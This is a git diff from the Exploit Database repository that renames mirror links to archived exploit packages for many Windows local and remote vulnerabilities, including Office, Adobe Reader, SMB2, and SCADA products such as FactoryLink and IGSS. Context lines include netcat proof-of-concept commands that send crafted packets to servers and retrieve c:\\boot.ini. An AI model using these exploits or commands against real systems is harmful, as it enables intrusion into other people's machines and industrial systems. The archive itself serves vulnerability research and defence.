-Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/cve-2004-0194.xfdf.xfdf
\ No newline at end of file
+Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17488.xfdf (cve-2004-0194.xfdf.xfdf)
\ No newline at end of file
diff --git a/platforms/windows/local/3260.txt b/platforms/windows/local/3260.txt
index 786c47fc0..6809ebbb2 100755
--- a/platforms/windows/local/3260.txt
+++ b/platforms/windows/local/3260.txt
@@ -24,7 +24,7 @@
+ Reference : http://www.microsoft.com/technet/security/advisory/932114.mspx - Microsoft Security Advisory (932114)
-- https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/02032007-word2000exp.doc
+- https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/3260.doc (02032007-word2000exp.doc)
- http://www.returnaddr.org/exploit/word2000
############ use at your own risk *******
diff --git a/platforms/windows/local/34648.txt b/platforms/windows/local/34648.txt
index 34299f273..b5e13ff23 100755
--- a/platforms/windows/local/34648.txt
+++ b/platforms/windows/local/34648.txt
@@ -1,4 +1,4 @@
Exploit: http://www.joxeankoret.com/download/comodo_sandbox_escape/sandbox_test1.tar.gz
-Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/sandbox_test1.tar.gz
+Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/34648.tar.gz (sandbox_test1.tar.gz)
Video: http://www.joxeankoret.com/download/comodo_sandbox_escape/video/sandbox_escape1.htm
\ No newline at end of file
diff --git a/platforms/windows/local/3664.txt b/platforms/windows/local/3664.txt
index a6b7e50bc..f9d91909c 100755
--- a/platforms/windows/local/3664.txt
+++ b/platforms/windows/local/3664.txt
@@ -16,6 +16,6 @@
# (/var/spool/atjobs/), xinetd (/etc/xinetd.d), /etc/logrotate.d, and more...
http://www.0xdeadbeef.info/exploits/raptor_truecrypt.tgz
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/04042007-raptor_truecrypt.tgz
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/3664.tgz
# milw0rm.com [2007-04-04]
diff --git a/platforms/windows/local/4178.txt b/platforms/windows/local/4178.txt
index 1170812fd..6d3fed824 100755
--- a/platforms/windows/local/4178.txt
+++ b/platforms/windows/local/4178.txt
@@ -3,6 +3,6 @@ Symantec AntiVirus symtdi.sys Local Privilege Escalation
Author: Zohiartze Herce
Site: http://48bits.com
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/07122007-symTDI_advisory.rar
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4178.rar (07122007-symTDI_advisory.rar)
# milw0rm.com [2007-07-12]
diff --git a/platforms/windows/local/4625.txt b/platforms/windows/local/4625.txt
index c374af330..9bcc206dd 100755
--- a/platforms/windows/local/4625.txt
+++ b/platforms/windows/local/4625.txt
@@ -26,7 +26,7 @@ do not use the exploit for attacking.
The attached file is at:
http://ruder.cdut.net/attach/MS_MDB_Vul/Microsoft_Jet_Engine_MDB_File_Parsing_Exploit.rar
- backup: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11162007-Microsoft_Jet_Engine_MDB_File_Parsing_Exploit.rar
+ backup: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4625.rar (11162007-Microsoft_Jet_Engine_MDB_File_Parsing_Exploit.rar)
MD5 Hash:73243B8823C8DC2C88AE0529CA13C4C6
diff --git a/platforms/windows/local/5287.txt b/platforms/windows/local/5287.txt
index 179ec4c75..c32bd17ec 100755
--- a/platforms/windows/local/5287.txt
+++ b/platforms/windows/local/5287.txt
@@ -1,5 +1,5 @@
Microsoft Office Excel Code Execution Exploit (MS08-014)
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-zha0_ms08_014.rar
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5287.rar (2008-zha0_ms08_014.rar)
# milw0rm.com [2008-03-21]
diff --git a/platforms/windows/local/5320.txt b/platforms/windows/local/5320.txt
index 7a12bd784..1eed21edd 100755
--- a/platforms/windows/local/5320.txt
+++ b/platforms/windows/local/5320.txt
@@ -2,7 +2,7 @@ Runs calc.exe on Office XP SP3 with updates < 03/11/08.
Just for fun...
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-ms08-016.tgz
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5320.tgz (2008-ms08-016.tgz)
Marsupilamipowa@hotmail.fr
diff --git a/platforms/windows/local/5442.cpp b/platforms/windows/local/5442.cpp
index 2de7e27c1..cc2ea466a 100755
--- a/platforms/windows/local/5442.cpp
+++ b/platforms/windows/local/5442.cpp
@@ -10,6 +10,6 @@
/// calc will not be run.
/////////////////////////////////////////////////////////////
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-exploit_08021.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5442.zip (2008-exploit_08021.zip)
// milw0rm.com [2008-04-14]
diff --git a/platforms/windows/local/5518.txt b/platforms/windows/local/5518.txt
index b55a31d69..7f7eca1ff 100755
--- a/platforms/windows/local/5518.txt
+++ b/platforms/windows/local/5518.txt
@@ -9,6 +9,6 @@
// Ruben Santamarta
// www.reversemode.com
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-ms08-25-exploit.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5518.zip (2008-ms08-25-exploit.zip)
# milw0rm.com [2008-04-28]
diff --git a/platforms/windows/local/6705.txt b/platforms/windows/local/6705.txt
index ec1c085b5..d953dbda7 100755
--- a/platforms/windows/local/6705.txt
+++ b/platforms/windows/local/6705.txt
@@ -29,7 +29,7 @@ Response.Write(output);
You can find the PoC exploit here http://www.argeniss.com/research/Churrasco.zip
-backup link: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-Churrasco.zip
+backup link: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/6705.zip (2008-Churrasco.zip)
Enjoy.
diff --git a/platforms/windows/local/6757.txt b/platforms/windows/local/6757.txt
index 0570031ce..3b99ba8d9 100755
--- a/platforms/windows/local/6757.txt
+++ b/platforms/windows/local/6757.txt
@@ -4,7 +4,7 @@ I have just uploaded a k-plugin for Kartoffel, which exploits a flaw
patched in the recent MS08-066 bulletin.
http://kartoffel.reversemode.com/downloads.php
-backup: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-afd_plugin.zip
+backup: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/6757.zip (2008-afd_plugin.zip)
For those researchers interesting in digging a little bit more into this
diff --git a/platforms/windows/local/6994.txt b/platforms/windows/local/6994.txt
index 63639e6f7..3517a67e9 100755
--- a/platforms/windows/local/6994.txt
+++ b/platforms/windows/local/6994.txt
@@ -1,6 +1,6 @@
Adobe Reader 'util.printf()' JavaScript Function Stack Buffer Overflow Exploit
author: Elazar
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-APSB08-19.pdf
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/6994.pdf (2008-APSB08-19.pdf)
# milw0rm.com [2008-11-05]
diff --git a/platforms/windows/local/7054.txt b/platforms/windows/local/7054.txt
index 808490d41..957c5cfd5 100755
--- a/platforms/windows/local/7054.txt
+++ b/platforms/windows/local/7054.txt
@@ -27,7 +27,7 @@
Exploit:
http://www.ntinternals.org/ntiadv0802/AKEProtect_Exp.zip
-backup: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-AKEProtect_Exp.zip
+backup: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/7054.zip (2008-AKEProtect_Exp.zip)
Advisory:
http://www.ntinternals.org/ntiadv0802/ntiadv0802.html
diff --git a/platforms/windows/local/7516.txt b/platforms/windows/local/7516.txt
index e9b6d9cb7..f8b8e13ac 100755
--- a/platforms/windows/local/7516.txt
+++ b/platforms/windows/local/7516.txt
@@ -27,7 +27,7 @@
Exploit:
http://www.ntinternals.org/ntiadv0807/Epfw_Exp.zip
-backup: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-Epfw_Exp.zip
+backup: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/7516.zip (2008-Epfw_Exp.zip)
Advisory:
http://www.ntinternals.org/ntiadv0807/ntiadv0807.html
diff --git a/platforms/windows/local/7533.txt b/platforms/windows/local/7533.txt
index cafa3a443..fc6f43366 100755
--- a/platforms/windows/local/7533.txt
+++ b/platforms/windows/local/7533.txt
@@ -27,7 +27,7 @@
Exploit:
http://www.ntinternals.org/ntiadv0810/PowerStrip_Exp.zip
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-PowerStrip_Exp.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/7533.zip (2008-PowerStrip_Exp.zip)
Advisory:
http://www.ntinternals.org/ntiadv0810/ntiadv0810.html
diff --git a/platforms/windows/local/8175.txt b/platforms/windows/local/8175.txt
index 19958bdb6..4d2399e36 100755
--- a/platforms/windows/local/8175.txt
+++ b/platforms/windows/local/8175.txt
@@ -30,7 +30,7 @@
Exploit:
http://ntinternals.org/ntiadv0809/MksMonEn_Exp.zip
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-MksMonEn_Exp.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/8175.zip (2009-MksMonEn_Exp.zip)
Advisory:
diff --git a/platforms/windows/local/8250.txt b/platforms/windows/local/8250.txt
index bc2d1ceeb..d6f743582 100755
--- a/platforms/windows/local/8250.txt
+++ b/platforms/windows/local/8250.txt
@@ -33,7 +33,7 @@
Exploit:
http://ntinternals.org/ntiadv0812/ElbyCDIO_Exp.zip
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-ElbyCDIO_Exp.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/8250.zip (2009-ElbyCDIO_Exp.zip)
Advisory:
http://ntinternals.org/ntiadv0812/ntiadv0812.html
diff --git a/platforms/windows/local/8280.txt b/platforms/windows/local/8280.txt
index 33f8ba21d..3a962e81a 100755
--- a/platforms/windows/local/8280.txt
+++ b/platforms/windows/local/8280.txt
@@ -3,6 +3,6 @@ Adobe Acrobat Reader JBIG2 Universal Exploit Bind Shell port 5500
write up: http://bl4cksecurity.blogspot.com/2009/03/adobe-acrobatreader-universal-exploit.html
down: http://blacksecurity.org/download/66/Adobe_JBIG2_Universal_Reader_Acrobat_Exploit
-back: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-bl4ck-adobe.zip
+back: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/8280.zip (2009-bl4ck-adobe.zip)
# milw0rm.com [2009-03-24]
diff --git a/platforms/windows/local/8322.txt b/platforms/windows/local/8322.txt
index d476ad19e..1579ecf3f 100755
--- a/platforms/windows/local/8322.txt
+++ b/platforms/windows/local/8322.txt
@@ -5,6 +5,6 @@ The vulnerability is caused due to the IOCTL handler of the "tmactmon.sys"
driver improperly processing user space parameters. This exploit execute
arbitrary code in kernel space via a specially crafted IOCTL.
-untested: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-trendmicro_local_expl_0day.zip
+untested: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/8322.zip 2009-trendmicro_local_expl_0day.zip)
# milw0rm.com [2009-03-30]
diff --git a/platforms/windows/local/8595.txt b/platforms/windows/local/8595.txt
index 6bb8adc01..2f5ba9933 100755
--- a/platforms/windows/local/8595.txt
+++ b/platforms/windows/local/8595.txt
@@ -21,6 +21,6 @@ Exploit By : www.Abysssec.com
note : this exploit is just for educational purpose so shellcode will execute calc if you want other shellcode change shellcode .
Exploit Link : http://abysssec.com/Adobe.Collab.getIcon().pdf
-Mirror Link : https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-Adobe.Collab.getIcon.pdf
+Mirror Link : https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/8595.pdf (2009-Adobe.Collab.getIcon.pdf)
# milw0rm.com [2009-05-04]
diff --git a/platforms/windows/local/8782.txt b/platforms/windows/local/8782.txt
index 7cf00cb77..573fbed57 100755
--- a/platforms/windows/local/8782.txt
+++ b/platforms/windows/local/8782.txt
@@ -35,7 +35,7 @@ Exploit:
http://ntinternals.org/ntiadv0814/PsDrv_Exp.zip
Mirror:
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-PsDrv_Exp.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/8782.zip (2009-PsDrv_Exp.zip)
Advisory:
http://ntinternals.org/ntiadv0814/ntiadv0814.html
diff --git a/platforms/windows/local/8799.txt b/platforms/windows/local/8799.txt
index 7d160ddf6..9ab10194d 100755
--- a/platforms/windows/local/8799.txt
+++ b/platforms/windows/local/8799.txt
@@ -28,7 +28,7 @@ php implement "\" character can escape safemode using function like excec .
PoC / Exploit :
orginal : www.abysssec.com/safemod-windows.zip
-mirror : https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-safemod-windows.zip
+mirror : https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/8799.zip (2009-safemod-windows.zip)
diff --git a/platforms/windows/local/8875.txt b/platforms/windows/local/8875.txt
index 62421bc6e..a038be4f2 100755
--- a/platforms/windows/local/8875.txt
+++ b/platforms/windows/local/8875.txt
@@ -31,7 +31,7 @@
Exploit:
http://ntinternals.org/ntiadv0806/OAmon_Exp.zip
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-OAmon_Exp.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/8875.zip (2009-OAmon_Exp.zip)
Advisory:
http://www.ntinternals.org/ntiadv0806/ntiadv0806.html
diff --git a/platforms/windows/local/9301.txt b/platforms/windows/local/9301.txt
index b0eeaf0e6..ba4ba6c5c 100755
--- a/platforms/windows/local/9301.txt
+++ b/platforms/windows/local/9301.txt
@@ -28,7 +28,7 @@
Exploit:
http://www.ntinternals.org/win32k/NtUserConsoleControl_Exp.zip
-back: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-NtUserConsoleControl_Exp.zip
+back: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9301.zip (2009-NtUserConsoleControl_Exp.zip)
Description:
http://www.ntinternals.org/index.html#09_07_30
diff --git a/platforms/windows/local/9579.txt b/platforms/windows/local/9579.txt
index f8f084c1b..c8614a3a0 100755
--- a/platforms/windows/local/9579.txt
+++ b/platforms/windows/local/9579.txt
@@ -13,6 +13,6 @@
#
http://www.coromputer.net/CVE-2009-0927_package.zip
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-CVE-2009-0927_package.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9579.zip (2009-CVE-2009-0927_package.zip)
# milw0rm.com [2009-09-03]
diff --git a/platforms/windows/remote/11173.txt b/platforms/windows/remote/11173.txt
index 62a4a99c3..2aab0ba45 100755
--- a/platforms/windows/remote/11173.txt
+++ b/platforms/windows/remote/11173.txt
@@ -6,4 +6,4 @@
# Tested on: xpsp3 ie6
# Download:
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/TrendMicro_web_deployment_activex0day.zip
\ No newline at end of file
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11173.zip (TrendMicro_web_deployment_activex0day.zip)
\ No newline at end of file
diff --git a/platforms/windows/remote/12614.txt b/platforms/windows/remote/12614.txt
index 6ec3063ac..aeda58600 100755
--- a/platforms/windows/remote/12614.txt
+++ b/platforms/windows/remote/12614.txt
@@ -1,5 +1,5 @@
Download:
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/safari_parent_close_sintsov.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/12614.zip (safari_parent_close_sintsov.zip)
Unzip and run START.htm
diff --git a/platforms/windows/remote/14179.txt b/platforms/windows/remote/14179.txt
index 89b369a6b..9aff00588 100755
--- a/platforms/windows/remote/14179.txt
+++ b/platforms/windows/remote/14179.txt
@@ -5,4 +5,4 @@ This vulnerability is because of using Alternate Data Stream to open a protected
authentication methods can be circumvented. In this technique, we can add a “:$i30:$INDEX_ALLOCATION” to a directory name to bypass the authentication.
Download:
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/IIS5.1_Authentication_Bypass.pdf
\ No newline at end of file
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14179.pdf (IIS5.1_Authentication_Bypass.pdf)
\ No newline at end of file
diff --git a/platforms/windows/remote/14267.txt b/platforms/windows/remote/14267.txt
index 446d47232..a99dbebde 100755
--- a/platforms/windows/remote/14267.txt
+++ b/platforms/windows/remote/14267.txt
@@ -87,7 +87,7 @@ possible to disable this feature.
http://aluigi.org/testz/onlywebs.zip
or
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/bfonlywebs.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14267.zip (bfonlywebs.zip)
- launch: onlywebs.exe c:\malicious_file.exe
- start the server launcher using the following string as sponsor and
diff --git a/platforms/windows/remote/14275.txt b/platforms/windows/remote/14275.txt
index 8f04288b2..ea9c97132 100755
--- a/platforms/windows/remote/14275.txt
+++ b/platforms/windows/remote/14275.txt
@@ -8,7 +8,7 @@
This bug utilizes Microsoft Help vuln for RCE.
You can test by browsing to http://krash.in/real-exp/exploit.ram
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/rp-0day-08-07-2010.tar
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14275.tar (rp-0day-08-07-2010.tar)
--webDEViL
diff --git a/platforms/windows/remote/14599.txt b/platforms/windows/remote/14599.txt
index a0cae7ba7..09655db29 100755
--- a/platforms/windows/remote/14599.txt
+++ b/platforms/windows/remote/14599.txt
@@ -1,4 +1,4 @@
Tested on my XPSP3+IE7+/nx=AlwaysOn, should work on Windows 7 with
the proper return value.
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/Dr_IDE-AoA-JIT.rar
\ No newline at end of file
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14599.rar (Dr_IDE-AoA-JIT.rar)
\ No newline at end of file
diff --git a/platforms/windows/remote/14674.txt b/platforms/windows/remote/14674.txt
index 984c8a90a..24fb314ad 100755
--- a/platforms/windows/remote/14674.txt
+++ b/platforms/windows/remote/14674.txt
@@ -43,4 +43,4 @@ http://blog.metasploit.com/2009/10/smb2-351-packets-from-trampoline.html
===========================================================================
Download:
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/smb2_exploit_release.zip
\ No newline at end of file
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14674.zip (smb2_exploit_release.zip)
\ No newline at end of file
diff --git a/platforms/windows/remote/14853.py b/platforms/windows/remote/14853.py
index 1877097a5..9140dc7d9 100755
--- a/platforms/windows/remote/14853.py
+++ b/platforms/windows/remote/14853.py
@@ -7,7 +7,7 @@
|_| |_|\____/_/ \_\____/|____/
http://www.exploit-db.com/adobe-acrobat-newclass-invalid-pointer-vulnerability/
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/moaub1-adobe-newclass.tar.gz
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14853.tar.gz (moaub1-adobe-newclass.tar.gz)
Title : Adobe Acrobat Reader and Flash Player “newclass” invalid pointer vulnerability
Analysis : http://www.abysssec.com
diff --git a/platforms/windows/remote/14886.py b/platforms/windows/remote/14886.py
index b3ee992cd..577565367 100755
--- a/platforms/windows/remote/14886.py
+++ b/platforms/windows/remote/14886.py
@@ -7,7 +7,7 @@
|_| |_|\____/_/ \_\____/|____/
http://www.exploit-db.com/movie-maker-remote-code-execution-ms10-016/
- https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/Movie-Maker-Remote-Code-Execution-Exploit.zip
+ https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14886.zip (Movie-Maker-Remote-Code-Execution-Exploit.zip)
Title : Movie Maker Remote Code Execution (MS10-016)
Version : moviemk.exe 2.1 (XP SP3)
diff --git a/platforms/windows/remote/14895.py b/platforms/windows/remote/14895.py
index 657b9f438..1bc0e4e33 100755
--- a/platforms/windows/remote/14895.py
+++ b/platforms/windows/remote/14895.py
@@ -7,7 +7,7 @@
|_| |_|\____/_/ \_\____/|____/
http://www.exploit-db.com/moaub-5-microsoft-mpeg-layer-3-audio-stack-based-overflow/
- https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/moaub-5-exploit.zip
+ https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14895.zip (moaub-5-exploit.zip)
'''
diff --git a/platforms/windows/remote/15056.py b/platforms/windows/remote/15056.py
index 274de4d2a..157f95fa3 100755
--- a/platforms/windows/remote/15056.py
+++ b/platforms/windows/remote/15056.py
@@ -20,7 +20,7 @@
MOAUB Number : MOAUB_20_BA
http://www.exploit-db.com/moaub-20-java-cmm-readmabcurvedata-stack-overflow/
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/moaub-20-exploit.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15056.zip (moaub-20-exploit.zip)
'''
import sys
diff --git a/platforms/windows/remote/15241.txt b/platforms/windows/remote/15241.txt
index 2962b96a3..7e859ebd9 100755
--- a/platforms/windows/remote/15241.txt
+++ b/platforms/windows/remote/15241.txt
@@ -60,5 +60,5 @@ SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS
SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS
-Code: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/iExploit12-DEP.zip
+Code: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15241.zip (iExploit12-DEP.zip)
diff --git a/platforms/windows/remote/15296.txt b/platforms/windows/remote/15296.txt
index 43695af78..2164c8483 100755
--- a/platforms/windows/remote/15296.txt
+++ b/platforms/windows/remote/15296.txt
@@ -213,7 +213,7 @@ The sample + exploit are tested on patched windows XP service pack 3.
here is exploit + binary analysis link:
http://abysssec.com/files/Adobe_Shockwave_Director_rcsL_Chunk_Memory_Corruption.zip
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/Adobe_Shockwave_Director_rcsL_Chunk_Memory_Corruption.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15296.zip
PS 1 : this vulnerability is not patched bug released by ZDI http://www.zerodayinitiative.com/advisories/ZDI-10-162/
PS 2 : itís possible to exploit this vulnerability on modern windows like Vista/7 too and itís up to readers Ö
diff --git a/platforms/windows/remote/15869.txt b/platforms/windows/remote/15869.txt
index 407fa71be..2d2473a6c 100755
--- a/platforms/windows/remote/15869.txt
+++ b/platforms/windows/remote/15869.txt
@@ -48,4 +48,4 @@ However, here we are. And two of three are unpatched.
proof of concept:
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9sg_ca_d2d.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15869.zip (9sg_ca_d2d.zip)
diff --git a/platforms/windows/remote/16594.rb b/platforms/windows/remote/16594.rb
index 6581789b5..dd383a7ec 100755
--- a/platforms/windows/remote/16594.rb
+++ b/platforms/windows/remote/16594.rb
@@ -31,7 +31,7 @@ class Metasploit3 < Msf::Exploit::Remote
[
[ 'CVE', '2010-3653'],
[ 'OSVDB', '68803'],
- [ 'URL', 'https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/Adobe_Shockwave_Director_rcsL_Chunk_Memory_Corruption.zip' ],
+ [ 'URL', 'https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15296.zip' ],
],
'DefaultOptions' =>
{
diff --git a/platforms/windows/remote/17022.txt b/platforms/windows/remote/17022.txt
index 99517aec3..c8fa95fe3 100755
--- a/platforms/windows/remote/17022.txt
+++ b/platforms/windows/remote/17022.txt
@@ -6,8 +6,8 @@ http://aluigi.org/adv/factorylink_4-adv.txt
http://aluigi.org/adv/factorylink_5-adv.txt
http://aluigi.org/adv/factorylink_6-adv.txt
-Advisory Archive: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/siemens_factory_link_adv.tar.gz
-PoC Archive: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/siemens_factory_link_poc.tar.gz
+Advisory Archive: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17022-1.tar.gz (siemens_factory_link_adv.tar.gz)
+PoC Archive: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17022-2.tar.gz (siemens_factory_link_poc.tar.gz)
#######################################################################
@@ -57,7 +57,7 @@ The Code
http://aluigi.org/poc/factorylink_x.zip
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/factorylink_x.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17022-x.zip (factorylink_x.zip)
factorylink_x 3 SERVER
@@ -84,7 +84,7 @@ The Code
http://aluigi.org/poc/factorylink_x.zip
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/factorylink_x.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17022-x.zip (factorylink_x.zip)
for downloading c:\boot.ini
factorylink_x 4 SERVER
@@ -116,7 +116,7 @@ The Code
===========
http://aluigi.org/poc/factorylink_3.zip
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/factorylink_3.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17022-3.zip (factorylink_3.zip)
nc SERVER 7579 < factorylink_3.dat
@@ -143,7 +143,7 @@ The Code
===========
http://aluigi.org/poc/factorylink_4.zip
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/factorylink_4.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17022-4.zip (factorylink_4.zip)
nc SERVER 7579 < factorylink_4.dat
@@ -167,7 +167,7 @@ The Code
===========
http://aluigi.org/poc/factorylink_5.zip
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/factorylink_5.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17022-5.zip (factorylink_5.zip)
download c:\boot.ini
nc SERVER 7579 < factorylink_5.dat
@@ -191,7 +191,7 @@ The Code
===========
http://aluigi.org/poc/factorylink_x.zip
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/factorylink_x.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17022-x.zip (factorylink_x.zip)
factorylink_x 1 SERVER
factorylink_x 2 SERVER
diff --git a/platforms/windows/remote/17024.txt b/platforms/windows/remote/17024.txt
index 1103c0aa4..5928dbd90 100755
--- a/platforms/windows/remote/17024.txt
+++ b/platforms/windows/remote/17024.txt
@@ -8,8 +8,8 @@ http://aluigi.org/adv/igss_6-adv.txt
http://aluigi.org/adv/igss_7-adv.txt
http://aluigi.org/adv/igss_8-adv.txt
-Advisory Archive: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/igss_adv.tar.gz
-PoC Archive: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/igss_poc.tar.gz
+Advisory Archive: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17024-adv.tar.gz (igss_adv.tar.gz)
+PoC Archive: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17024-poc.tar.gz (igss_poc.tar.gz)
#######################################################################
@@ -69,7 +69,7 @@ The Code
===========
http://aluigi.org/poc/igss_1.zip
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/igss_1.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17024-1.zip (igss_1.zip)
example for downloading c:\boot.ini:
nc SERVER 12401 < igss_1a.dat
@@ -113,7 +113,7 @@ The Code
===========
http://aluigi.org/poc/igss_2.zip
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/igss_2.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17024-2.zip (igss_2.zip)
nc SERVER 12401 < igss_2a.dat
nc SERVER 12401 < igss_2b.dat
@@ -176,7 +176,7 @@ The Code
===========
http://aluigi.org/poc/igss_3.zip
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/igss_3.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17024-3.zip (igss_3.zip)
nc SERVER 12401 < igss_3.dat
@@ -215,7 +215,7 @@ The Code
===========
http://aluigi.org/poc/igss_4.zip
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/igss_4.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17024-4.zip (igss_4.zip)
Proof-of-concept via "ReadFile":
nc SERVER 12401 < igss_4a.dat
@@ -265,7 +265,7 @@ The following proof-of-concept exploits the vulnerability from the
other vulnerabilities before the reaching of this bugged function:
http://aluigi.org/poc/igss_5.zip
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/igss_5.zip
